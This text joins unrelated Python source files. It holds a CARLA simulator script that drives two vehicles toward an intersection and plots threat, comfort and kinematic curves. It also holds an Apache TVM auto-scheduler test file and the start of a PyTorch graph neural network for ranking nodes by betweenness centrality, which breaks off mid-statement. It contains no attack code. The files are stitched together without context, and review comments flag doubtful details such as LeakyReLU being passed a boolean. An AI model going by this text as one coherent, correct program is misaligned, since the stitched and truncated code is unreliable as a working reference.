        # Narrowed from a bare `except:` and chained so the cause is visible.
        raise ValueError("window_size and order have to be of type int") from exc
    if window_size % 2 != 1 or window_size < 1:
        raise TypeError("window_size size must be a positive odd number")
    if window_size < order + 2:
        raise TypeError("window_size is too small for the polynomials order")
    order_range = range(order + 1)
    half_window = (window_size - 1) // 2
    # Precompute the least-squares coefficients. A plain ndarray replaces the
    # deprecated np.mat/.A pair; np.linalg.pinv then yields an ndarray whose
    # row `deriv` holds the convolution kernel for the requested derivative.
    b = np.array([[k ** i for i in order_range] for k in range(-half_window, half_window + 1)])
    m = np.linalg.pinv(b)[deriv] * rate ** deriv * factorial(deriv)
    # Pad the signal at the extremes with values taken from the signal itself
    # (mirrored about the endpoints) so the output keeps the input length.
    firstvals = y[0] - np.abs(y[1:half_window + 1][::-1] - y[0])
    lastvals = y[-1] + np.abs(y[-half_window - 1:-1][::-1] - y[-1])
    y = np.concatenate((firstvals, y, lastvals))
    return np.convolve(m[::-1], y, mode='valid')
def plot_threat_curve(thread_record_d, thread_record_a, thread_record_s):
    """Visualize the likelihood curves of the three threat degrees.

    Each argument is a sequence of [time_step, likelihood] pairs for the
    dangerous / attentive / safe degree respectively; time steps are 0.1 s
    apart (values are divided by 10 below). Blocks on plt.show().
    """
    # (commented-out intermediate debug plotting removed for readability)
    title_font_dict = {'family': 'Times New Roman',
                       'color': 'black',
                       'weight': 'normal',
                       'size': 30}
    axis_font_dict = {'family': 'Times New Roman',
                      'color': 'black',
                      'weight': 'normal',
                      'size': 30}
    legend_font = {'family': 'Times New Roman',
                   'weight': 'normal',
                   'size': 30,
                   }
    thread_record_s = np.array(thread_record_s)
    thread_record_a = np.array(thread_record_a)
    thread_record_d = np.array(thread_record_d)
    # Last recorded time step: used both as slice bound and as time horizon.
    end = thread_record_s[:, 0][len(thread_record_s[:, 0]) - 1]
    step = 4
    # Down-sample the raw records before interpolation.
    thread_record_s = thread_record_s[0:int(end):step]
    thread_record_a = thread_record_a[0:int(end):step]
    thread_record_d = thread_record_d[0:int(end):step]
    # Resample each likelihood series onto a common 200-point time axis (s).
    xnew = np.linspace(0, (end - step - 1) / 10, 200)
    func_s = interpolate.interp1d(thread_record_s[:, 0] / 10., thread_record_s[:, 1], kind='slinear')
    func_a = interpolate.interp1d(thread_record_a[:, 0] / 10., thread_record_a[:, 1], kind='slinear')
    func_d = interpolate.interp1d(thread_record_d[:, 0] / 10., thread_record_d[:, 1], kind='slinear')
    ynew_s = func_s(xnew)
    ynew_a = func_a(xnew)
    ynew_d = func_d(xnew)
    # Smooth the resampled curves (window 21 samples, quadratic fit).
    ynew_s = savitzky_golay(ynew_s, 21, order=2)
    ynew_a = savitzky_golay(ynew_a, 21, order=2)
    ynew_d = savitzky_golay(ynew_d, 21, order=2)
    plt.figure(figsize=(16, 7))
    # Clip to [0, 1] because smoothing can overshoot the likelihood range.
    plt.plot(xnew, np.clip(ynew_s, 0., 1.), color="green", label="Safe", linewidth=2)
    plt.fill_between(xnew, 0, np.clip(ynew_s, 0., 1.), alpha=0.2, facecolor='green')
    plt.plot(xnew, np.clip(ynew_a, 0., 1.), color="orange", label="Attentive", linewidth=2)
    plt.fill_between(xnew, 0, np.clip(ynew_a, 0., 1.), alpha=0.2, facecolor='orange')
    plt.plot(xnew, np.clip(ynew_d, 0., 1.), color="red", label="Dangerous", linewidth=2)
    plt.fill_between(xnew, 0, np.clip(ynew_d, 0., 1.), alpha=0.2, facecolor='red')
    plt.title('Likelihood of Different Threat Degree', fontdict=title_font_dict)
    plt.xlabel('Time (s)', fontdict=axis_font_dict)
    plt.ylabel('Likelihood', fontdict=axis_font_dict)
    plt.tick_params(labelsize=20)
    plt.legend(prop=legend_font)
    plt.ylim(0., 1.)
    left, right = plt.xlim()
    plt.xlim(0., right)
    plt.show()
def plot_comfort_curve(comfort_level_m, comfort_level_a, comfort_level_c):
    """Visualize the passenger-comfort score curves.

    Arguments are sequences of [time_step, score] pairs for the moderate /
    radical(?) / comfortable levels respectively; time steps are 0.1 s apart.
    NOTE(review): the m/a/c argument-to-label mapping below (s→Comfortable,
    a→Moderate, d→Radical) should be confirmed against comfort_level_scores().
    Blocks on plt.show().
    """
    # (commented-out intermediate debug plotting removed for readability)
    title_font_dict = {'family': 'Times New Roman',
                       'color': 'black',
                       'weight': 'normal',
                       'size': 30}
    axis_font_dict = {'family': 'Times New Roman',
                      'color': 'black',
                      'weight': 'normal',
                      'size': 30}
    legend_font = {'family': 'Times New Roman',
                   'weight': 'normal',
                   'size': 30,
                   }
    comfort_level_c = np.array(comfort_level_c)
    comfort_level_a = np.array(comfort_level_a)
    comfort_level_m = np.array(comfort_level_m)
    # Last recorded time step: used both as slice bound and as time horizon.
    end = comfort_level_c[:, 0][len(comfort_level_c[:, 0]) - 1]
    step = 4
    # Down-sample the raw records before interpolation.
    comfort_level_c = comfort_level_c[0:int(end):step]
    comfort_level_a = comfort_level_a[0:int(end):step]
    comfort_level_m = comfort_level_m[0:int(end):step]
    # Resample each score series onto a common 200-point time axis (s).
    xnew = np.linspace(0, (end - step - 1) / 10, 200)
    func_s = interpolate.interp1d(comfort_level_c[:, 0] / 10., comfort_level_c[:, 1], kind='slinear')
    func_a = interpolate.interp1d(comfort_level_a[:, 0] / 10., comfort_level_a[:, 1], kind='slinear')
    func_d = interpolate.interp1d(comfort_level_m[:, 0] / 10., comfort_level_m[:, 1], kind='slinear')
    ynew_s = func_s(xnew)
    ynew_a = func_a(xnew)
    ynew_d = func_d(xnew)
    # Smooth the resampled curves (window 21 samples, quadratic fit).
    ynew_s = savitzky_golay(ynew_s, 21, order=2)
    ynew_a = savitzky_golay(ynew_a, 21, order=2)
    ynew_d = savitzky_golay(ynew_d, 21, order=2)
    plt.figure(figsize=(16, 7))
    # Clip to [0, 1] because smoothing can overshoot the score range.
    plt.plot(xnew, np.clip(ynew_s, 0., 1.), color="green", label="Comfortable", linewidth=2)
    plt.fill_between(xnew, 0, np.clip(ynew_s, 0., 1.), alpha=0.2, facecolor='green')
    plt.plot(xnew, np.clip(ynew_a, 0., 1.), color="orange", label="Moderate", linewidth=2)
    plt.fill_between(xnew, 0, np.clip(ynew_a, 0., 1.), alpha=0.2, facecolor='orange')
    plt.plot(xnew, np.clip(ynew_d, 0., 1.), color="red", label="Radical", linewidth=2)
    plt.fill_between(xnew, 0, np.clip(ynew_d, 0., 1.), alpha=0.2, facecolor='red')
    plt.title('Passenger Comfort Assessment', fontdict=title_font_dict)
    plt.xlabel('Time (s)', fontdict=axis_font_dict)
    plt.ylabel('Score', fontdict=axis_font_dict)
    plt.tick_params(labelsize=20)
    plt.legend(prop=legend_font)
    plt.ylim(0., 1.)
    left, right = plt.xlim()
    plt.xlim(0., right)
    plt.show()
def plot_vel_acc_rdis(vel, acc, rdis):
    """Plot host velocity, acceleration and relative distance on one shared
    time axis using a host axis plus two parasite y-axes.

    Each argument is a sequence of [time_step, value] pairs; time steps are
    0.1 s apart. Blocks on plt.show().
    """
    # (commented-out single-axis alternative plotting removed for readability)
    title_font_dict = {'family': 'Times New Roman',
                       'color': 'black',
                       'weight': 'normal',
                       'fontsize': 15}
    axis_font_dict = {'family': 'Times New Roman',
                      'color': 'black',
                      'weight': 'normal',
                      'fontsize': 30}
    legend_font = {'family': 'Times New Roman',
                   'weight': 'normal',
                   'size': 10,
                   }
    # Convert [step, value] records to seconds / value arrays.
    vel_x = np.array(vel)[:, 0]/10.
    vel_y = np.array(vel)[:, 1]
    acc_x = np.array(acc)[:, 0]/10.
    acc_y = np.array(acc)[:, 1]
    rdis_x = np.array(rdis)[:, 0]/10.
    rdis_y = np.array(rdis)[:, 1]
    fig = plt.figure(figsize=(10, 3.5), dpi=200)
    # Host axis carries velocity; the two parasite axes share its x-axis.
    vel_axes = HostAxes(fig, [0.05, 0.1, 0.8, 0.8])
    acc_axes = ParasiteAxes(vel_axes, sharex=vel_axes)
    rdis_axes = ParasiteAxes(vel_axes, sharex=vel_axes)
    vel_axes.parasites.append(acc_axes)
    vel_axes.parasites.append(rdis_axes)
    vel_axes.set_ylabel('Velocity (m/s)')
    vel_axes.set_xlabel('Time (s)')
    # Hide the host's right spine so the acceleration axis can use it.
    vel_axes.axis['right'].set_visible(False)
    acc_axes.axis['right'].set_visible(True)
    acc_axes.set_ylabel('Acceleration (m/s^2)')
    acc_axes.axis['right'].major_ticklabels.set_visible(True)
    acc_axes.axis['right'].label.set_visible(True)
    rdis_axes.set_ylabel('Relative distance (m)')
    # Push the third y-axis 60 points to the right of the plot area.
    offset = (60, 0)
    new_axisline = rdis_axes._grid_helper.new_fixed_axis
    rdis_axes.axis['right2'] = new_axisline(loc='right', axes=rdis_axes, offset=offset)
    fig.add_axes(vel_axes)
    p1, = vel_axes.plot(vel_x, vel_y, label="Vel", linewidth=2)
    p2, = acc_axes.plot(acc_x, acc_y, label="Acc", linewidth=2)
    p3, = rdis_axes.plot(rdis_x, rdis_y, label="RD", linewidth=2)
    vel_axes.legend(prop=legend_font)
    vel_axes.set_ylim(0, np.max(vel_y)+1)
    vel_axes.set_xlim(0, np.max(vel_x))
    rdis_axes.set_ylim(0, np.max(rdis_y)+1)
    plt.title('Kinematic information of host vehicle', fontdict=title_font_dict)
    plt.legend(prop=legend_font)
    plt.show()
def control_host(host_vehicle):
    """Controller thread for the host vehicle.

    Nominally paces the host so it would reach the fixed conflict point
    (-77.5, -3) at the same time as the other vehicle; once the configured
    threat threshold trips (and collision_avoidance is on), switches to the
    emergency strategy selected by the module-level `strategy_type`.

    Records velocity / acceleration / threat / comfort / relative-distance
    time series, then plots them and optionally pickles them to
    `save_experiment_data_to` after the run ends (host passes x < -85).

    NOTE(review): relies on module globals `world`, `strategy_type`,
    `collision_avoidance`, `save_experiment_data`; `math` and `logger` are
    presumably provided via the `carla_utils` wildcard imports — confirm.
    """

    def pd_control_for_collision(velocity, distance_collision_host, last_error):
        """Simple PD controller that paces the host toward the conflict
        point so it arrives at the same time as the other vehicle
        (collision-provocation mode). Returns (throttle in [0,1], error)."""
        k_p = 1
        k_d = 0.5
        other = get_other(world)
        other_pos = other.get_location()
        # Distance from the other vehicle to the fixed conflict point.
        # NOTE(review): `pos` is read from the enclosing loop via closure.
        distance_collision = other_pos.distance(carla.Location(x=-77.5, y=-3., z=pos.z))
        o_velocity = other.get_velocity()
        o_v = math.sqrt(o_velocity.x**2+o_velocity.y**2)
        # Other vehicle's time to reach the conflict point (eps avoids /0).
        ttc = distance_collision/(o_v+1e-10)
        # Host speed required to arrive at the same moment.
        target_v = distance_collision_host/(ttc+1e-10)
        error = target_v - math.sqrt(velocity.x**2+velocity.y**2)
        d_error = error - last_error
        throttle = k_p*error + k_d*d_error
        return max(min(throttle, 1.), 0.), error

    def pd_control_for_safety(degree_likelihood, target_likelihood, last_error, kp, kd):
        """PD controller that tracks a target likelihood of a threat degree.

        Return:
            if val > 0, brake,
            else, throttle
        """
        # k_p = 4
        # k_d = 2.5
        k_p = kp
        k_d = kd
        error = target_likelihood - degree_likelihood
        d_error = error - last_error
        val = k_p*error + k_d*d_error
        return max(min(val, 1.), -1.), error

    last_error_pdcc = 0.   # PD state of the collision-pacing controller
    last_error_pdcs = 0.   # PD state of the safety controller
    time_step = 0
    emergency_control = False  # set once the threat threshold trips
    pd_control = True          # nominal pacing control active
    thread_record_d = []
    thread_record_a = []
    thread_record_s = []
    comfort_record_m = []
    comfort_record_a = []
    comfort_record_c = []
    vel_record = []
    acc_record = []
    relative_distance_record = []
    other = get_other(world)
    record_start_step = 50  # skip the spawn/settling transient when recording
    while True:
        ## record info
        pos = host_vehicle.get_location()
        velocity = host_vehicle.get_velocity()
        velocity_ = math.sqrt(velocity.x**2 + velocity.y**2)
        acc = host_vehicle.get_acceleration()
        if time_step >= record_start_step:
            vel_record.append([time_step - record_start_step, velocity_])
            acc_record.append([time_step - record_start_step, -acc.x])
        # Comfort scores are derived from longitudinal acceleration only.
        comfort_scores = comfort_level_scores(-acc.x)
        if time_step >= record_start_step:
            comfort_record_m.append([time_step - record_start_step, comfort_scores[0]])
            comfort_record_a.append([time_step - record_start_step, comfort_scores[1]])
            comfort_record_c.append([time_step - record_start_step, comfort_scores[2]])
        other_pos = other.get_location()
        other_velocity = other.get_velocity()
        if time_step >= record_start_step:
            relative_distance_record.append([time_step - record_start_step, pos.distance(other_pos)])
        # Host's remaining distance to the fixed conflict point.
        distance_collision = pos.distance(carla.Location(x=-77.5, y=-3., z=pos.z))
        ## assess the situation
        ego_v_state = ego_v.ego_vehicle()
        ego_v_state.set_position(position=(pos.x, pos.y, pos.z))
        ego_v_state.set_linear(linear=(velocity.x, velocity.y, velocity.z))
        ego_v_state.set_size(size=(1.6, 1.6, 3.2))
        road_obj_state = road_o.road_obj()
        road_obj_state.set_position(position=(other_pos.x, other_pos.y, other_pos.z))
        road_obj_state.set_linear(linear=(other_velocity.x, other_velocity.y, other_velocity.z))
        road_obj_state.set_size(size=(1.6, 1.6, 3.2))
        # score indices used below: [0]=dangerous, [1]=attentive, [2]=safe.
        score = _assess_one_obj_threat_score(ego_v_state, road_obj_state)
        degree = _score_2_threat_degree(score)
        if time_step >= record_start_step:
            thread_record_d.append([time_step - record_start_step, score[0]])
            thread_record_a.append([time_step - record_start_step, score[1]])
            thread_record_s.append([time_step - record_start_step, score[2]])
        if pd_control:
            throttle, last_error_pdcc = pd_control_for_collision(velocity, distance_collision, last_error_pdcc)
            control = carla.VehicleControl(throttle=throttle)
            host_vehicle.apply_control(control)
        if emergency_control:
            ## strategy-1 : emergency braking
            if strategy_type == STRATEGY.AGGRESSIVE:
                if degree == safety_degree.dangerous and score[0] >= 0.8:
                    control = carla.VehicleControl(brake=1.)
                    host_vehicle.apply_control(control)
                elif degree == safety_degree.safe and score[2] >= 0.8:
                    control = carla.VehicleControl(throttle=1.)
                    host_vehicle.apply_control(control)
                else:
                    control = carla.VehicleControl(brake=1.)
                    host_vehicle.apply_control(control)
            ## strategy-2 : pd control tracking the "safe" likelihood
            elif strategy_type == STRATEGY.CONSERVATIVE:
                val, last_error_pdcs = pd_control_for_safety(score[2], 0.8, last_error_pdcs, kp=0.1, kd=0.1)
                if val >= 0:
                    control = carla.VehicleControl(brake=val)
                else:
                    control = carla.VehicleControl(throttle=min(1., math.fabs(val)+0.5))
            ## strategy-3 : pd control tracking the "attentive" likelihood
            elif strategy_type == STRATEGY.NORMAL:
                val, last_error_pdcs = pd_control_for_safety(score[1], 0.5, last_error_pdcs, kp=2, kd=0.5)
                if val <= 0:
                    control = carla.VehicleControl(brake=math.fabs(val))
                else:
                    control = carla.VehicleControl(throttle=val)
            else:
                raise ValueError('strategy_type wrong...')
            # NOTE(review): for AGGRESSIVE this re-applies the control set
            # inside the branch above — apparently redundant but harmless.
            host_vehicle.apply_control(control)
        # Stop the experiment once the host has passed the intersection.
        if pos.x < -85:
            logger.info('Stop test...')
            break
        ## transform the control state (one-way switch: nominal -> emergency)
        ## for strategy-1
        if strategy_type == STRATEGY.AGGRESSIVE:
            if collision_avoidance and degree == safety_degree.dangerous and score[0] >= 0.8:
                pd_control = False
                emergency_control = True
        ## for strategy-2
        elif strategy_type == STRATEGY.CONSERVATIVE:
            if collision_avoidance and degree == safety_degree.safe and score[2] <= 0.8:
                pd_control = False
                emergency_control = True
        ## for strategy-3
        elif strategy_type == STRATEGY.NORMAL:
            if collision_avoidance and degree == safety_degree.attentive and score[1] >= 0.5:
                pd_control = False
                emergency_control = True
        # (large block of commented-out legacy control/recording code removed)
        time.sleep(0.05)
        time_step += 1
    # (commented-out record-trimming code removed)
    plot_threat_curve(thread_record_d, thread_record_a, thread_record_s)
    plot_vel_acc_rdis(vel_record, acc_record, relative_distance_record)
    plot_comfort_curve(comfort_record_m, comfort_record_a, comfort_record_c)
    if save_experiment_data:
        save_dict = {'experiment_name': experiment_name,
                     'thread_record_d': thread_record_d,
                     'thread_record_a': thread_record_a,
                     'thread_record_s': thread_record_s,
                     'vel_record': vel_record,
                     'acc_record': acc_record,
                     'relative_distance_record': relative_distance_record,
                     'comfort_record_m': comfort_record_m,
                     'comfort_record_a': comfort_record_a,
                     'comfort_record_c': comfort_record_c}
        with open(save_experiment_data_to, 'wb') as f:
            pickle.dump(save_dict, f)
        logger.info('save success... file - %s'%(save_experiment_data_to))
def control_other(other_vehicle):
    """Controller thread for the other vehicle: apply a random throttle drawn
    from the module-level `other_vehicle_speed_range` at roughly 10 Hz,
    forever."""
    while True:
        throttle_cmd = random.uniform(other_vehicle_speed_range[0],
                                      other_vehicle_speed_range[1])
        other_vehicle.apply_control(carla.VehicleControl(throttle=throttle_cmd))
        time.sleep(0.1)
if __name__ == '__main__':
    ##############################
    ####### general config #######
    # Randomized scenario parameters: spawn offset and throttle range of the
    # other vehicle.
    other_vehicle_init_pos = random.randint(40, 50)
    other_vehicle_speed_range = (random.uniform(0.4, 0.5), random.uniform(0.6, 0.7))
    ##############################
    #### carla world init ####
    client = carla.Client('127.0.0.1', 2000)
    client.set_timeout(10.0)  # seconds
    logger.info('Carla connect success...')
    logger.info('Carla world initing...')
    world = client.get_world()
    # Start from a clean world so role_name lookups are unambiguous.
    destroy_all_actors(world)
    ## vehicle blueprint
    blueprints = world.get_blueprint_library().filter('vehicle.nissan.micra')
    blueprints = [x for x in blueprints if int(x.get_attribute('number_of_wheels')) == 4]
    ## host vehicle settings
    host_vehicle_bp = random.choice(blueprints)
    if host_vehicle_bp.has_attribute('color'):
        color = random.choice(host_vehicle_bp.get_attribute('color').recommended_values)
        host_vehicle_bp.set_attribute('color', color)
    host_vehicle_bp.set_attribute('role_name', 'host_vehicle')
    # Host approaches the intersection westbound (yaw=180) along y=-3.
    transform = carla.Transform(carla.Location(x=-39.0, y=-3., z=1.8), carla.Rotation(pitch=0., yaw=180., roll=0.))
    try_spawn_at(world, host_vehicle_bp, transform, autopilot=False)
    ## other vehicle settings
    other_vehicle_bp = random.choice(blueprints)
    if other_vehicle_bp.has_attribute('color'):
        color = random.choice(other_vehicle_bp.get_attribute('color').recommended_values)
        other_vehicle_bp.set_attribute('color', color)
    other_vehicle_bp.set_attribute('role_name', 'other_vehicle')
    # Other vehicle approaches southbound (yaw=-90) from a random y offset.
    transform = carla.Transform(carla.Location(x=-77.75, y=float(other_vehicle_init_pos), z=1.8),
                                carla.Rotation(pitch=0., yaw=-90., roll=0.))
    try_spawn_at(world, other_vehicle_bp, transform, autopilot=False)
    time.sleep(1)  ## waiting carla synchronous
    logger.info('host vehicle location: '+str(get_host(world).get_location()))
    logger.info('other vehicle location: '+str(get_other(world).get_location()))
    logger.info('other vehicle throttle range: '+str(other_vehicle_speed_range))
    logger.info('The test will start in 1 seconds, notice the Carla screen!!')
    time.sleep(1)
    logger.info('Start testing...')
    # Run the two vehicle controllers concurrently.
    control_host_t = threading.Thread(target=control_host, args=(get_host(world),))
    control_other_t = threading.Thread(target=control_other, args=(get_other(world),))
    control_host_t.start()
    control_other_t.start()
    # NOTE(review): busy-wait keeps the main thread alive but burns a CPU
    # core; a join() would be cheaper — left unchanged.
    while True:
        pass
|
test_auto_scheduler_search_policy.py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Test search policy"""
import random
import numpy as np
import tempfile
import tvm
from tvm import auto_scheduler
from test_auto_scheduler_common import matmul_auto_scheduler_test, PropagatingThread
def search_common(workload=matmul_auto_scheduler_test, target="llvm",
                  search_policy='empty', seed=None, runner='local',
                  cost_model=None, num_measure_trials=2,
                  init_search_callbacks=None):
    """Run one auto-scheduler search for a 128x128x128 matmul and verify the
    built kernel against numpy.

    Fixes over the previous version:
    - `seed` and `cost_model` defaults were evaluated once at import time
      (every call shared one "random" seed and one RandomModel instance);
      they are now None-sentinels resolved per call.
    - a caller-supplied `init_search_callbacks` list is copied instead of
      being mutated in place.
    - the failure path chains the original exception instead of hiding it.

    Raises:
        Exception: if lowering/building/verification fails (seed included in
            the message, original error attached as __cause__).
    """
    if seed is None:
        seed = random.randint(1, 1 << 30)
    if cost_model is None:
        # NOTE(review): cost_model is currently unused by the body; kept for
        # interface compatibility.
        cost_model = auto_scheduler.RandomModel()
    print("Test %s schedule search with the default search policy" % (target))
    random.seed(seed)
    N = 128
    workload_key = auto_scheduler.make_workload_key(workload, (N, N, N))
    dag = auto_scheduler.ComputeDAG(workload_key)
    target = tvm.target.create(target)
    task = auto_scheduler.SearchTask(dag, workload_key, target)

    with tempfile.NamedTemporaryFile() as fp:
        log_file = fp.name
        # Copy so a caller-provided list is not mutated across calls.
        init_search_callbacks = list(init_search_callbacks or [])
        init_search_callbacks.append(auto_scheduler.PreloadMeasuredStates(log_file))
        if search_policy == 'empty':
            search_policy = auto_scheduler.EmptyPolicy(task)
        elif search_policy == 'sketch':
            search_policy = auto_scheduler.SketchPolicy(task,
                                                        init_search_callbacks=init_search_callbacks)
        tuning_options = auto_scheduler.TuningOptions(num_measure_trials=num_measure_trials,
            runner=runner, verbose=1, measure_callbacks=[auto_scheduler.RecordToFile(log_file)])
        sch, args = auto_scheduler.auto_schedule(task, search_policy, tuning_options)
        inp, res = auto_scheduler.load_best(log_file, workload_key, target)

        print("==== Python Code ====")
        print(dag.print_python_code_from_state(inp.state))
        try:
            print("==== Lowered Stmt ====")
            print(tvm.lower(sch, args, simple_mode=True))
            mod = tvm.build(sch, args, target)
            ctx = tvm.context(str(target), 0)
            dtype = dag.tensors[0].dtype
            a = tvm.nd.array(np.random.uniform(size=(N, N)).astype(dtype), ctx)
            b = tvm.nd.array(np.random.uniform(size=(N, N)).astype(dtype), ctx)
            c = tvm.nd.array(np.zeros((N, N), dtype=dtype), ctx)
            mod(a, b, c)
            tvm.testing.assert_allclose(c.asnumpy(), np.dot(
                a.asnumpy(), b.asnumpy()), rtol=1e-5)
            print("==== Verification passed ====")
        except Exception as err:
            # Chain so the real failure is visible alongside the seed.
            raise Exception("Error encountered with seed: %d" % (seed)) from err
    print()
def test_workload_registry_search_basic():
    """Smoke-test the empty search policy via the workload registry, for a
    callable workload and two registered workload names."""
    if not tvm.runtime.enabled("llvm"):
        return
    # wrap the search in a new thread to avoid the conflict
    # between python's multiprocessing and tvm's thread pool
    for extra in ({},
                  {'workload': "matmul_auto_scheduler_test"},
                  {'workload': "matmul_auto_scheduler_test_rename_1"}):
        kwargs = {'seed': 944563397}
        kwargs.update(extra)
        worker = PropagatingThread(target=search_common, kwargs=kwargs)
        worker.start()
        worker.join()
def test_sketch_search_policy_basic():
    """Smoke-test the sketch search policy on the LLVM target."""
    if not tvm.runtime.enabled("llvm"):
        return
    # wrap the search in a new thread to avoid the conflict
    # between python's multiprocessing and tvm's thread pool
    worker = PropagatingThread(
        target=search_common,
        kwargs=dict(seed=944563397, search_policy='sketch'))
    worker.start()
    worker.join()
def test_sketch_search_policy_cuda_rpc_runner():
    """Smoke-test the sketch search policy on CUDA through the local RPC
    measurement runner."""
    if not tvm.runtime.enabled("cuda"):
        return
    measure_ctx = auto_scheduler.LocalRPCMeasureContext()
    # wrap the search in a new thread to avoid the conflict
    # between python's multiprocessing and tvm's thread pool
    worker = PropagatingThread(
        target=search_common,
        kwargs=dict(seed=944563397, search_policy='sketch', target='cuda',
                    runner=measure_ctx.runner))
    worker.start()
    worker.join()
if __name__ == "__main__":
    # Run the three smoke tests directly (no pytest runner required).
    test_workload_registry_search_basic()
    test_sketch_search_policy_basic()
    test_sketch_search_policy_cuda_rpc_runner()
|
qweNet.py | import sys
import time
import networkx as nx
import numpy as np
import torch
import torch.nn.functional as F
from scipy.stats import kendalltau as kd
from tensorboardX import SummaryWriter
from torch import nn
from torch_geometric.data import DataLoader
from torch_geometric.nn import GCNConv
from torch_geometric.utils import from_networkx
from tqdm import tqdm
import multiprocessing
from data_util.data_utils import betweenness_centrality_parallel as pbc
from data_util.data_utils import ranktopk
from data_util.generate_bc_feature import generate_bc_feature
import pickle
# ---- model / training hyper-parameters ----
EMBEDDING_SIZE = 128            # node embedding width produced by the GNN
REG_HIDDEN = (int)(EMBEDDING_SIZE / 2)  # hidden width of the regression head
MIN_SIZE = 100                  # min node count of generated training graphs
MAX_SIZE = 200                  # max node count of generated training graphs
MAX_EPOCH = 10000
N_VALID = 100  # number of validation graphs
N_TRAIN = 1000                  # number of training graphs
BATCH_SIZE = 32
LEARNING_RATE = 0.0001
max_bp_iter = 4  # neighbor propagation steps
writer = SummaryWriter('./../result')  # TensorBoard log sink
num_percheck = 200              # training iterations between validations
node_feat_dim = 3  # initial node features, [Dc,1,1]
aux_feat_dim = 2  # extra node features in the hidden layer in the decoder, [Dc,CI1,CI2,1]
initialization_stddev = 0.01
combineID = 1  # how to combine self embedding and neighbor embedding,
               # 0:structure2vec(add node feature and neighbor embedding)
               # 1:graphsage(concatenation); 2:gru
class decoder(nn.Module):
    """Graph embedding stage: a linear input projection followed by
    `decoder_maxBpIter` rounds of GCN propagation combined through a GRU
    cell, with element-wise max pooling across rounds."""

    def __init__(self, decoder_maxBpIter, decoder_nodeFeatDim, decoder_embeddingSize, inTraining=True):
        super(decoder, self).__init__()
        self.maxBpIter = decoder_maxBpIter
        # NOTE(review): nn.LeakyReLU's first positional argument is
        # negative_slope, not inplace; `inTraining == False` passes a bool
        # (slope 0.0 or 1.0). `inplace=` was likely intended — confirm.
        self.inputLayer = nn.Sequential(nn.Linear(decoder_nodeFeatDim, decoder_embeddingSize), nn.LeakyReLU(
            inTraining == False), nn.BatchNorm1d(decoder_embeddingSize))
        #In forward repeat three layers
        self.nodeConv = GCNConv(decoder_embeddingSize, decoder_embeddingSize)
        self.combine = nn.GRUCell(decoder_embeddingSize, decoder_embeddingSize)
        self.outThisCycle = nn.BatchNorm1d(decoder_embeddingSize)
        self.outputLayer = nn.BatchNorm1d(decoder_embeddingSize)

    def forward(self, x, edge_Index):
        x = self.inputLayer(x)
        max_x = x
        for i in range(0, self.maxBpIter):
            pre_x = x
            x = self.nodeConv(x, edge_Index)
            # GRU cell merges the pre-propagation and propagated embeddings.
            x = self.combine(pre_x, x)
            x = self.outThisCycle(x)
            # Element-wise max over all propagation depths so far.
            max_x = torch.max(torch.stack((max_x, x), dim = 0), 0)[0]
            # NOTE(review): indentation was lost in this source dump; the
            # placement of this feedback assignment inside the loop is the
            # most plausible reading — confirm against the original file.
            x = max_x
        x = self.outputLayer(x)
        return x
# two layer MLP, the first hidden layer, I add a Batchnorm to accelerated the training rate.
class encoder(nn.Module):
    """Two-layer MLP head: a hidden layer (optionally batch-normalized)
    followed by a linear output layer, with optional auxiliary features
    concatenated before the output layer."""

    def __init__(self, encoder_inDim, encoder_numHidden1, encoder_outDim, encoder_auxFeatDim, encoderHaveBatch=True, inTraining=True):
        super(encoder, self).__init__()
        self.auxFeatDim = encoder_auxFeatDim
        # NOTE(review): nn.LeakyReLU's first argument is negative_slope;
        # `inTraining == False` feeds it a bool — `inplace=` was presumably
        # intended. Reproduced unchanged.
        hidden_layers = [nn.Linear(encoder_inDim, encoder_numHidden1)]
        if encoderHaveBatch == True:
            hidden_layers.append(nn.BatchNorm1d(encoder_numHidden1))
        hidden_layers.append(nn.LeakyReLU(inTraining == False))
        self.hidden1 = nn.Sequential(*hidden_layers)
        self.out = nn.Sequential(
            nn.Linear(encoder_numHidden1 + encoder_auxFeatDim, encoder_outDim))

    def forward(self, x, aux_feat):
        hidden = self.hidden1(x)
        if self.auxFeatDim != 0:
            # Auxiliary features are appended column-wise before the head.
            hidden = torch.cat((hidden, aux_feat), 1)
        return self.out(hidden)
class QweNet(nn.Module):
    """End-to-end betweenness-centrality ranking model: a graph `decoder`
    producing node embeddings, followed by the MLP `encoder` head that
    outputs one score per node. Constructor signature is unchanged.
    """

    def __init__(self, decoder_maxBpIter, decoder_nodeFeatDim, decoder_embeddingSize, encoder_inDim, encoder_numHidden1, encoder_outDim, encoder_auxFeatDim, encoderHaveBatch=True, inTraining=True):
        super(QweNet, self).__init__()
        self.decoder = decoder(
            decoder_maxBpIter, decoder_nodeFeatDim, decoder_embeddingSize, inTraining)
        self.encoder = encoder(encoder_inDim, encoder_numHidden1,
                               encoder_outDim, encoder_auxFeatDim, encoderHaveBatch, inTraining)

    def forward(self, data):
        """Run the model on a PyG `data` object (reads `data.x` and
        `data.edge_index`); returns the encoder's per-node output."""
        x, edgeIndex = data.x, data.edge_index
        x = self.decoder(x, edgeIndex)
        xlen = x.size()[0]
        # Fixes over the previous revision:
        #  * torch.empty() fed uninitialized (nondeterministic) memory to the
        #    encoder; the data pipeline (QweTool.insert_data) builds all-ones
        #    auxiliary features, so ones are used here as well.
        #  * the tensor was 1-D, but encoder.forward concatenates it with a
        #    2-D embedding along dim 1, so it must be (N, auxFeatDim).
        #  * the hard-coded .cuda() broke CPU execution; follow x's device.
        aux_feat = torch.ones(xlen, self.encoder.auxFeatDim, device=x.device)
        x = self.encoder(x, aux_feat)
        return x
class QweTool:
    """Training / evaluation driver for QweNet: generates synthetic graphs,
    converts them to PyG data objects labelled with betweenness centrality,
    and runs the train / validate / test loops.
    """

    def __init__(self):
        # NOTE(review): num_train / num_test are first assigned in
        # clearTrainset/clearTestset but incremented in insert_data, so
        # calling insert_data before the matching clear* raises
        # AttributeError (evaluateRealData relies on a prior clearTestset).
        self.trainSet = [] # pyg data
        self.testSet = []
        self.device = torch.device(
